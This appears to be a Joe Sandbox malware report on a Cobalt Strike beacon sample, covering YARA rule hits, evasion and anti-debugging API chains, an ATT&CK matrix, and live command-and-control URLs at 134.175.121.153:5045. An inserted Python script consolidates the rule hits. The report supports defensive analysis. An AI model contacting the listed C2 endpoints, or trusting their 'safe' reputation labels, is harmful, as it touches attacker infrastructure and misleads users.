          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: Process Memory Space: 2VsJzzWTpA.exe PID: 7304, type: MEMORYSTR Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: Process Memory Space: 2VsJzzWTpA.exe PID: 7304, type: MEMORYSTR Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: Process Memory Space: 2VsJzzWTpA.exe PID: 7304, type: MEMORYSTR Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
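          The rule hits above are listed once per scan context (raw unpacked PE, mapped unpacked PE, memory dump, process memory strings), so the same rule appears up to six times and the short "description / Author" rows repeat the detailed ones. The Python script below is an added example, not part of the Joe Sandbox report and not code from any of the rule sets it cites: it parses rows in the detailed form used above (rule name followed by key = value metadata; rows that carry only a description are skipped), groups hits by rule, and reports which rules are corroborated by more than one scan context, since a rule that fires on both the carved PE and the live memory dump is stronger evidence than a string hit in process memory alone. The sample rows are a constructed subset of the ones above with the metadata shortened; the type label is accepted both with and without the space before "Matched rule:".

```python
"""Consolidate Joe Sandbox 'Matched rule' rows across scan contexts."""
import re

# Detailed row: "Source: <src>, type: <CTX>Matched rule: <name> key = value, ...".
# The context label is accepted with or without a space before "Matched rule:".
ROW_RE = re.compile(
    r"^Source:\s*(?P<source>.+?),\s*type:\s*(?P<ctx>\w+?)\s*"
    r"Matched rule:\s*(?P<rule>\S+)\s*(?P<meta>.*)$"
)
# Split metadata only on commas that introduce a new "key = " pair, so a value
# such as "scan_context = file, memory" keeps its own comma.
META_SPLIT_RE = re.compile(r",\s*(?=\w+\s*=\s)")

# Constructed subset of the rows above (metadata abbreviated), one hit per line.
SAMPLE_ROWS = """\
Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, description = Attempts to detect Cobalt Strike based on strings found in BEACON, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike
Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, description = Attempts to detect Cobalt Strike based on strings found in BEACON, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike
Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, description = Attempts to detect Cobalt Strike based on strings found in BEACON, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike
Source: Process Memory Space: 2VsJzzWTpA.exe PID: 7304, type: MEMORYSTRMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
"""


def parse_row(line):
    """Return (source, context, rule, metadata dict), or None for a row in another form."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    meta = {}
    for part in META_SPLIT_RE.split(m.group("meta")):
        if "=" in part:
            key, value = part.split("=", 1)
            meta[key.strip()] = value.strip()
    return m.group("source"), m.group("ctx"), m.group("rule"), meta


def consolidate(text):
    """Group rows by rule name, recording every context and source the rule fired in."""
    rules = {}
    for line in text.splitlines():
        parsed = parse_row(line)
        if parsed is None:
            continue
        source, ctx, rule, meta = parsed
        entry = rules.setdefault(rule, {"contexts": set(), "sources": set(), "meta": {}})
        entry["contexts"].add(ctx)
        entry["sources"].add(source)
        for key, value in meta.items():   # first occurrence of each key wins
            entry["meta"].setdefault(key, value)
    return rules


def corroborated(rules, min_contexts=2):
    """Rules that fired in at least min_contexts distinct scan contexts."""
    return sorted(r for r, e in rules.items() if len(e["contexts"]) >= min_contexts)


def render(rules):
    """One line per rule, strongest corroboration first."""
    out = []
    for name in sorted(rules, key=lambda r: (-len(rules[r]["contexts"]), r)):
        e = rules[name]
        out.append(f"{name}: contexts={sorted(e['contexts'])} sources={len(e['sources'])} "
                   f"author={e['meta'].get('author', 'unknown')}")
    return "\n".join(out)


if __name__ == "__main__":
    print(render(consolidate(SAMPLE_ROWS)))
```

          Splitting the metadata on every comma would break the Elastic rules' "scan_context = file, memory" value, which is why the splitter looks ahead for the next "key =" instead; a description that itself contained ", word = " would still be cut, so treat the parsed metadata as a convenience, not as ground truth.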
          Source: classification engine Classification label: mal100.troj.evad.winEXE@1/2@1/1
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_00670B70 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Code function: 0_2_00673A64 CreateThread,GetModuleHandleA,GetProcAddress,CreateToolhelp32Snapshot,Thread32Next,Sleep
          Source: 2VsJzzWTpA.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: 2VsJzzWTpA.exe ReversingLabs: Detection: 86%
          Source: 2VsJzzWTpA.exe Virustotal: Detection: 73%
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: mswsock.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: winhttp.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: winnsi.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: urlmon.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: srvcli.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: schannel.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: mskeyprotect.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: ntasn1.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: dpapi.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: gpapi.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: cryptnet.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: dhcpcsvc.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: webio.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: dnsapi.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: rasadhlp.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: fwpuclnt.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: cabinet.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: ncrypt.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Section loaded: ncryptsslp.dll
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

          Data Obfuscation

          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Unpacked PE file: 0.2.2VsJzzWTpA.exe.660000.2.unpack
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_0066D83C GetModuleHandleA,LoadLibraryA,GetProcAddress
          Source: 2VsJzzWTpA.exe | Static PE information: section name: .xdata
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_001D776C push 0000006Ah; retf
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_0069916C push 0000006Ah; retf
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_006801A8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_00675854
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_0066FA1C
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Evasive API call chain: GetLocalTime,DecisionNodes (graph_0-37564)
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_0-37701)
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | API coverage: 6.4 %
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_0066FA1C
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe TID: 7308 | Thread sleep time: -90000s >= -30000s
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe TID: 7320 | Thread sleep time: -120000s >= -30000s
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe TID: 7320 | Thread sleep time: -60000s >= -30000s
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_00679220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_00671C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Thread delayed: delay time: 60000
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Thread delayed: delay time: 60000
          Source: 2VsJzzWTpA.exe, 00000000.00000002.3497152919.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2763192162.00000000007BF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW;
          Source: 2VsJzzWTpA.exe, 00000000.00000002.3497152919.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497152919.000000000075C000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2763192162.00000000007BF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | API call chain: ExitProcess graph end node (graph_0-37631)

          Anti Debugging

          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep (graph_0-37305)
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_0068F810 MultiByteToWideChar,MultiByteToWideChar,DebuggerProbe,DebuggerRuntime,IsDebuggerPresent,_RTC_GetSrcLine,WideCharToMultiByte,WideCharToMultiByte
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_00689744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_0066D83C GetModuleHandleA,LoadLibraryA,GetProcAddress
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_0068C0C8 _lseeki64_nolock,_lseeki64_nolock,GetProcessHeap,HeapAlloc,_errno,_errno,_setmode_nolock,__doserrno,_errno,_setmode_nolock,GetProcessHeap,HeapFree,_lseeki64_nolock,SetEndOfFile,_errno,__doserrno,GetLastError,_lseeki64_nolock
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_004542E4 SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_00402F62 SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_006924F0 SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_006844D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter

          HIPS / PFW / Operating System Protection Evasion

          Source: Yara match | File source: Process Memory Space: 2VsJzzWTpA.exe PID: 7304, type: MEMORYSTR
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_0067DF50 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_00692050 AllocateAndInitializeSid
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_00401990 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_00675E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Remote Access Functionality

          Source: Yara match | File source: Process Memory Space: 2VsJzzWTpA.exe PID: 7304, type: MEMORYSTR
          Source: Yara match | File source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.2VsJzzWTpA.exe.1a0000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_00676A78 socket,htons,ioctlsocket,closesocket,bind,listen
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_00676670 htonl,htons,socket,closesocket,bind,ioctlsocket
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_00692630 bind
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe | Code function: 0_2_0067EE8C socket,closesocket,htons,bind,listen
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts
          2
          Native API
          2
          Valid Accounts
          2
          Valid Accounts
          2
          Valid Accounts
          OS Credential Dumping1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          2
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading
          21
          Access Token Manipulation
          111
          Virtualization/Sandbox Evasion
          LSASS Memory1
          Query Registry
          Remote Desktop ProtocolData from Removable Media1
          Non-Standard Port
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          Process Injection
          21
          Access Token Manipulation
          Security Account Manager241
          Security Software Discovery
          SMB/Windows Admin SharesData from Network Shared Drive1
          Ingress Tool Transfer
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          DLL Side-Loading
          1
          Process Injection
          NTDS111
          Virtualization/Sandbox Evasion
          Distributed Component Object ModelInput Capture1
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
          Obfuscated Files or Information
          LSA Secrets1
          Process Discovery
          SSHKeylogging11
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Software Packing
          Cached Domain Credentials1
          Account Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading
          DCSync1
          System Owner/User Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          File and Directory Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow4
          System Information Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          Source | Detection | Scanner | Label
          2VsJzzWTpA.exe | 86% | ReversingLabs | Win64.Backdoor.CobaltStrike
          2VsJzzWTpA.exe | 74% | Virustotal |
          2VsJzzWTpA.exe | 100% | Avira | HEUR/AGEN.1344321
          2VsJzzWTpA.exe | 100% | Joe Sandbox ML |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label
          https://134.175.121.153/ | 0% | Avira URL Cloud | safe
          https://134.175.121.153:5045/loadK | 0% | Avira URL Cloud | safe
          134.175.121.153 | 0% | Avira URL Cloud | safe
          https://134.175.121.153/Z | 0% | Avira URL Cloud | safe
          https://134.175.121.153:5045/loadp | 0% | Avira URL Cloud | safe
          http://127.0.0.1:%u/ | 0% | Avira URL Cloud | safe
          https://134.175.121.153:5045/load | 0% | Avira URL Cloud | safe
          https://134.175.121.153:5045/loadn | 0% | Avira URL Cloud | safe
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
              198.187.3.20.in-addr.arpa | unknown | unknown | false | | high
              Name | Malicious | Antivirus Detection | Reputation
              134.175.121.153 | true | Avira URL Cloud: safe | unknown
              Name | Source | Malicious | Antivirus Detection | Reputation
              https://134.175.121.153:5045/loadK | 2VsJzzWTpA.exe, 00000000.00000003.2763264612.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497152919.00000000007B3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://134.175.121.153/ | 2VsJzzWTpA.exe, 00000000.00000002.3497152919.000000000075C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://127.0.0.1:%u/ | 2VsJzzWTpA.exe, 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://134.175.121.153/Z | 2VsJzzWTpA.exe, 00000000.00000002.3497152919.000000000075C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://134.175.121.153:5045/loadp | 2VsJzzWTpA.exe, 00000000.00000003.2763264612.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497152919.00000000007B3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://134.175.121.153:5045/load | 2VsJzzWTpA.exe, 00000000.00000002.3497152919.000000000084A000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2308989806.000000000084A000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2763216324.000000000084A000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2763264612.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497152919.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497152919.000000000081A000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497478511.0000000003CB2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://134.175.121.153:5045/loadn | 2VsJzzWTpA.exe, 00000000.00000003.2763216324.000000000081A000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2308989806.0000000000818000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2308900312.0000000000817000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497152919.000000000081A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              IP | Domain | Country | ASN | ASN Name | Malicious
              134.175.121.153 | unknown | China | 45090 | CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | true
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1582935
              Start date and time:2025-01-01 02:03:47 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 5m 6s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Run name:Run with higher sleep bypass
              Number of new started processes analysed:5
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:2VsJzzWTpA.exe
              renamed because original name is a hash value
              Original Sample Name:791bbe51360bb7afbe10c8daf7ad6b5c.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@1/2@1/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 15
              • Number of non-executed functions: 165
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
              • Excluded IPs from analysis (whitelisted): 199.232.214.172, 52.149.20.212, 20.3.187.198, 20.12.23.50, 13.107.246.45
